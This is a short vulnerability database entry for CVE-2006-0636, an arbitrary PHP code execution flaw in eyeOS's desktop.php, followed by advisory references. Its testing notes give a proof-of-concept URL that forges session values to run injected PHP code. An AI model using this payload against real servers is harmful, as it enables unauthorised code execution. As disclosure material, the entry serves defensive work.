eyeOS desktop.php _SESSION Handling Arbitrary PHP Code Execution

2006-02-07T03:17:38
ID OSVDB:23002
Type osvdb
Reporter OSVDB
Modified 2006-02-07T03:17:38

Description

Manual Testing Notes

http://[target]/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo();

References:

Vendor URL: http://www.eyeos.org/ Security Tracker: 1015609 Secunia Advisory ID:18757 Other Advisory URL: http://www.gulftech.org/?node=research&article_id=00096-02072006 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0101.html ISS X-Force ID: 24569 FrSIRT Advisory: ADV-2006-0466 CVE-2006-0636